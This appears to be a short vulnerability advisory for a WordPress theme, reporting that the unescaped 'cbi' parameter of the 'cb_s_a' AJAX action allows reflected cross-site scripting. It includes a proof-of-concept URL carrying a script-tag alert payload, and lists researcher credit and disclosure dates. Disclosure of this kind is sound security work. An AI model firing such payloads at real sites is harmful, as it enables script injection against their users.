The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/admin-ajax.php?action=cb_s_a&cbi=<script>alert(/XSS/);</script>
Fariq Fadillah Gusti Insani
Fariq Fadillah Gusti Insani
Yes
2020-09-21 (about 1 years ago)
2022-02-23 (about 2 months ago)
2022-04-12 (about 1 months ago)